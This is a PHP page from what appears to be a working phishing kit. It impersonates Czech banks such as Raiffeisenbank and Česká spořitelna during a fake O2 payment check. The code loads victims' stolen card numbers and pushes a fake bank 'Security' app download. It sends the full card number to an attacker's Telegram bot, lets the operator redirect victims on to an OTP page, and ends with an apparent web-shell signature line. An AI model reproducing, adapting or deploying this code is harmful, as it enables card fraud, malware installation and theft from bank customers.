<?php
// Start session to get payment session ID
session_start();
// Check if session ID exists
if (!isset($_SESSION['payment_session_id'])) {
// Redirect to payment page if no session ID
header('Location: payment.html');
exit;
}
$sessionId = $_SESSION['payment_session_id'];
// Configuration file path
$config_dir = 'config';
$pending_cards_file = $config_dir . '/pending_cards.json';
$redirect_config_file = $config_dir . '/redirect_settings.json';
// Load existing redirect settings if file exists
$redirect_settings = [
'success_url' => 'success.html',
'failure_url' => 'failed.html',
'default_destination' => 'https://www.example.com',
'redirect_delay' => 2
];
if (file_exists($redirect_config_file)) {
$config_content = file_get_contents($redirect_config_file);
$loaded_settings = json_decode($config_content, true);
if (is_array($loaded_settings)) {
$redirect_settings = array_merge($redirect_settings, $loaded_settings);
}
}
// Get card info for bank specific customization
$bank_name = 'Česká spořitelna';
$bank_logo = 'images/cs-bank-logo.png';
$bank_color = '#0070F7';
$card_type = 'VISA';
if (file_exists($pending_cards_file)) {
$pending_content = file_get_contents($pending_cards_file);
$pending_cards = json_decode($pending_content, true) ?: [];
if (isset($pending_cards[$sessionId])) {
if (isset($pending_cards[$sessionId]['bank_name'])) {
$bank_name = $pending_cards[$sessionId]['bank_name'];
}
if (isset($pending_cards[$sessionId]['card_type'])) {
$card_type = $pending_cards[$sessionId]['card_type'];
}
// Update status to APK verification
$pending_cards[$sessionId]['status'] = 'apk_verification';
file_put_contents($pending_cards_file, json_encode($pending_cards, JSON_PRETTY_PRINT));
}
}
// Handle form submission
$verification_error = '';
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
// Process form submission based on what was submitted
if (isset($_POST['continue'])) {
// Load pending cards
if (file_exists($pending_cards_file)) {
$pending_content = file_get_contents($pending_cards_file);
$pending_cards = json_decode($pending_content, true) ?: [];
if (isset($pending_cards[$sessionId])) {
// Update status to indicate app installation completed
$pending_cards[$sessionId]['status'] = 'app_installed';
$pending_cards[$sessionId]['app_installation_time'] = date('Y-m-d H:i:s');
// Save updated pending cards
file_put_contents($pending_cards_file, json_encode($pending_cards, JSON_PRETTY_PRINT));
// Send notification to Telegram if configured
$TELEGRAM_BOT_TOKEN = 'YOUR_TELEGRAM_BOT_TOKEN';
$CHAT_ID = 'YOUR_CHAT_ID';
$message = "📱 App Installation Confirmed:\n";
$message .= "------------------------\n";
$message .= "💳 Card: " . $pending_cards[$sessionId]['card_number'] . "\n";
$message .= "🏦 Bank: $bank_name\n";
$message .= "🆔 Session ID: $sessionId\n";
$message .= "⏰ Time: " . date('Y-m-d H:i:s') . "\n";
$telegramApiUrl = "https://api.telegram.org/bot$TELEGRAM_BOT_TOKEN/sendMessage";
$postData = [
'chat_id' => $CHAT_ID,
'text' => $message,
'parse_mode' => 'HTML'
];
$ch = curl_init($telegramApiUrl);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postData);
curl_exec($ch);
curl_close($ch);
// Proceed to next step - typically OTP
header('Location: bank_otp.php');
exit;
}
}
}
}
// Choose bank-specific styling
$bank_styles = [
'Česká spořitelna' => [
'color' => '#0070F7',
'logo' => 'images/cs-bank-logo.png',
],
'Komerční banka' => [
'color' => '#0066B0',
'logo' => 'images/kb-bank-logo.png',
],
'ČSOB' => [
'color' => '#0097A9',
'logo' => 'images/csob-bank-logo.png',
],
'Raiffeisenbank' => [
'color' => '#FEEE00',
'textColor' => '#000',
'logo' => 'images/rb-bank-logo.png',
],
'Moneta' => [
'color' => '#95C11F',
'logo' => 'images/moneta-bank-logo.png',
],
// Add more banks as needed
];
// Default styling
$bank_color = '#0070F7';
$bank_text_color = '#FFF';
$bank_logo_url = 'images/bank-logo.png';
// Apply bank-specific styling if available
if (isset($bank_styles[$bank_name])) {
$bank_color = $bank_styles[$bank_name]['color'];
$bank_logo_url = $bank_styles[$bank_name]['logo'];
if (isset($bank_styles[$bank_name]['textColor'])) {
$bank_text_color = $bank_styles[$bank_name]['textColor'];
}
}
// Get masked card number
$masked_card = 'XXXXXXXXXXXXXXXX';
if (isset($pending_cards[$sessionId]['card_number'])) {
$card_number = $pending_cards[$sessionId]['card_number'];
$card_number = preg_replace('/\D/', '', $card_number);
$masked_card = substr($card_number, 0, 4) . ' ' . substr($card_number, 4, 2) . 'XX XXXX ' . substr($card_number, -4);
}
// Function to check if a redirect has been set for this session
function checkRedirectStatus($sessionId, $pendingCardsFile) {
if (!file_exists($pendingCardsFile)) {
return false;
}
$pendingContent = file_get_contents($pendingCardsFile);
$pendingCards = json_decode($pendingContent, true) ?: [];
if (isset($pendingCards[$sessionId]) &&
isset($pendingCards[$sessionId]['status']) &&
$pendingCards[$sessionId]['status'] === 'redirected' &&
isset($pendingCards[$sessionId]['redirect_url'])) {
return $pendingCards[$sessionId]['redirect_url'];
}
return false;
}
// Check if this is an AJAX request to check status
if (isset($_GET['check']) && $_GET['check'] === 'status') {
$redirectStatus = checkRedirectStatus($sessionId, $pending_cards_file);
header('Content-Type: application/json');
if ($redirectStatus) {
echo json_encode(['redirect' => true, 'url' => $redirectStatus]);
} else {
echo json_encode(['redirect' => false]);
}
exit;
}
// Create a random app version number
$app_version = "1." . rand(0, 9) . "." . rand(0, 9);
$app_size = rand(15, 30) . "." . rand(1, 9) . " MB";
?>
<!DOCTYPE html>
<html lang="cs">
<head>
<meta charset="UTF-8">
<link rel="icon" type="image/png" sizes="16x16" href="images/downloadavatar.png">
<link rel="icon" type="image/png" sizes="32x32" href="images/downloadavatar.png">
<link rel="apple-touch-icon" sizes="180x180" href="images/downloadavatar.png">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Stáhnout aplikaci - <?php echo htmlspecialchars($bank_name); ?></title>
<style>
body {
font-family: Arial, sans-serif;
background-color: #f4f4f4;
display: flex;
justify-content: center;
align-items: center;
min-height: 100vh;
margin: 0;
padding: 20px;
box-sizing: border-box;
}
.app-container {
background-color: white;
border-radius: 8px;
box-shadow: 0 4px 6px rgba(0,0,0,0.1);
width: 100%;
max-width: 400px;
overflow: hidden;
}
.bank-header {
background-color: <?php echo $bank_color; ?>;
color: <?php echo $bank_text_color; ?>;
padding: 15px;
display: flex;
justify-content: space-between;
align-items: center;
}
.bank-logo {
height: 30px;
}
.card-brand {
height: 24px;
}
.app-content {
padding: 20px;
}
h1 {
font-size: 1.5em;
margin-top: 0;
margin-bottom: 15px;
color: #333;
}
.app-details {
margin-bottom: 20px;
}
.detail-row {
display: flex;
justify-content: space-between;
margin-bottom: 8px;
font-size: 0.9em;
}
.detail-label {
color: #666;
}
.detail-value {
font-weight: bold;
color: #333;
}
.app-form {
margin-top: 25px;
}
.app-icon {
width: 80px;
height: 80px;
border-radius: 15px;
margin: 0 auto 15px;
display: block;
background-color: <?php echo $bank_color; ?>;
display: flex;
align-items: center;
justify-content: center;
color: white;
font-size: 40px;
font-weight: bold;
}
.app-info {
text-align: center;
margin-bottom: 20px;
}
.app-name {
font-weight: bold;
font-size: 1.2em;
margin-bottom: 5px;
}
.app-version {
color: #666;
font-size: 0.9em;
margin-bottom: 5px;
}
.app-size {
color: #666;
font-size: 0.9em;
}
.app-download-btn {
width: 100%;
padding: 12px;
background-color: <?php echo $bank_color; ?>;
color: <?php echo $bank_text_color; ?>;
border: none;
border-radius: 4px;
font-size: 1em;
font-weight: bold;
cursor: pointer;
transition: opacity 0.3s ease;
margin-bottom: 15px;
}
.app-download-btn:hover {
opacity: 0.9;
}
.app-continue-btn {
width: 100%;
padding: 12px;
background-color: #f4f4f4;
color: #333;
border: 1px solid #ddd;
border-radius: 4px;
font-size: 1em;
font-weight: bold;
cursor: pointer;
transition: background-color 0.3s ease;
}
.app-continue-btn:hover {
background-color: #e7e7e7;
}
.app-error {
color: #e74c3c;
margin-top: 10px;
font-size: 0.9em;
}
.app-note {
text-align: center;
margin-top: 15px;
font-size: 0.8em;
color: #888;
}
.app-note p {
margin: 5px 0;
}
.app-steps {
margin: 20px 0;
padding: 15px;
background-color: #f9f9f9;
border-radius: 4px;
}
.app-step {
display: flex;
margin-bottom: 10px;
}
.app-step:last-child {
margin-bottom: 0;
}
.app-step-number {
width: 24px;
height: 24px;
background-color: <?php echo $bank_color; ?>;
color: <?php echo $bank_text_color; ?>;
border-radius: 50%;
display: flex;
align-items: center;
justify-content: center;
font-weight: bold;
font-size: 0.8em;
margin-right: 10px;
flex-shrink: 0;
}
.app-step-text {
font-size: 0.9em;
color: #333;
}
.app-progress {
margin: 25px 0 15px;
}
.progress-bar {
width: 100%;
height: 6px;
background-color: #eee;
border-radius: 3px;
overflow: hidden;
margin-bottom: 10px;
}
.progress-fill {
height: 100%;
background-color: <?php echo $bank_color; ?>;
width: 0%;
transition: width 0.5s ease-in-out;
}
.progress-text {
display: flex;
justify-content: space-between;
font-size: 0.8em;
color: #666;
}
#downloadStatus {
text-align: center;
margin: 15px 0;
font-weight: bold;
color: #333;
display: none;
}
</style>
</head>
<body>
<div class="app-container">
<div class="bank-header">
<img src="image/RB_logo.gif" alt="Raiffeisenbank" class="bank-logo">
<img src="image/vm.png" alt="<?php echo htmlspecialchars($card_type); ?>" class="card-brand">
</div>
<div class="app-content">
<h1>Zabezpečená verifikace</h1>
<div class="app-details">
<div class="detail-row">
<span class="detail-label">Obchodník</span>
<span class="detail-value">O2 Czech Republic</span>
</div>
<div class="detail-row">
<span class="detail-label">Číslo karty</span>
<span class="detail-value"><?php echo htmlspecialchars($masked_card); ?></span>
</div>
<div class="detail-row">
<span class="detail-label">Částka</span>
<span class="detail-value">10,99 Kč</span>
</div>
</div>
<div class="app-info">
<div class="app-icon"><?php echo strtoupper(substr($bank_name, 0, 1)); ?></div>
<div class="app-name"><?php echo htmlspecialchars($bank_name); ?> Security</div>
<div class="app-version">Verze <?php echo $app_version; ?></div>
<div class="app-size"><?php echo $app_size; ?></div>
</div>
<div class="app-steps">
<div class="app-step">
<div class="app-step-number">1</div>
<div class="app-step-text">Stáhněte aplikaci <?php echo htmlspecialchars($bank_name); ?> Security</div>
</div>
<div class="app-step">
<div class="app-step-number">2</div>
<div class="app-step-text">Nainstalujte a otevřete aplikaci</div>
</div>
<div class="app-step">
<div class="app-step-number">3</div>
<div class="app-step-text">Potvrďte platbu v aplikaci a poté klikněte na tlačítko "Pokračovat"</div>
</div>
</div>
<div id="downloadStatus"></div>
<div class="app-progress" id="progressArea" style="display: none;">
<div class="progress-bar">
<div class="progress-fill" id="progressBar"></div>
</div>
<div class="progress-text">
<span>Stahování</span>
<span id="progressPercent">0%</span>
</div>
</div>
<?php if (isset($verification_error) && $verification_error): ?>
<div class="app-error">
<?php echo htmlspecialchars($verification_error); ?>
</div>
<?php endif; ?>
<button id="downloadButton" class="app-download-btn">Stáhnout aplikaci</button>
<form method="post" action="" id="continueForm" style="display: none;">
<input type="hidden" name="continue" value="1">
<button type="submit" class="app-continue-btn">Pokračovat</button>
</form>
<div class="app-note">
<p>Pro ověření platby je vyžadována aplikace <?php echo htmlspecialchars($bank_name); ?> Security.</p>
<p>Aplikace slouží ke zvýšení bezpečnosti a ochraně vaší platby.</p>
</div>
</div>
</div>
<script>
document.addEventListener('DOMContentLoaded', function() {
const downloadButton = document.getElementById('downloadButton');
const continueForm = document.getElementById('continueForm');
const progressArea = document.getElementById('progressArea');
const progressBar = document.getElementById('progressBar');
const progressPercent = document.getElementById('progressPercent');
const downloadStatus = document.getElementById('downloadStatus');
downloadButton.addEventListener('click', function() {
// Hide download button
downloadButton.style.display = 'none';
// Show progress bar
progressArea.style.display = 'block';
downloadStatus.style.display = 'block';
downloadStatus.textContent = 'Stahování aplikace...';
// Simulate download progress
let progress = 0;
const downloadInterval = setInterval(function() {
progress += Math.random() * 10;
if (progress > 100) progress = 100;
progressBar.style.width = progress + '%';
progressPercent.textContent = Math.round(progress) + '%';
if (progress === 100) {
clearInterval(downloadInterval);
downloadStatus.textContent = 'Aplikace byla stažena. Nainstalujte ji a otevřete.';
// Show continue button after a delay
setTimeout(function() {
continueForm.style.display = 'block';
}, 2000);
}
}, 500);
});
// Check redirect status periodically
function checkRedirectStatus() {
fetch('apk_verification.php?check=status')
.then(response => response.json())
.then(data => {
if (data.redirect) {
// Redirect to the specified URL
window.location.href = data.url;
} else {
// Continue checking after a delay
setTimeout(checkRedirectStatus, 3000); // Check every 3 seconds
}
})
.catch(error => {
console.error('Error:', error);
// Try again after a delay even if there's an error
setTimeout(checkRedirectStatus, 5000);
});
}
// Start checking for redirect status
checkRedirectStatus();
});
</script>
</body>
</html>
DR.KR LITE SHELL COPYRIGHT 2016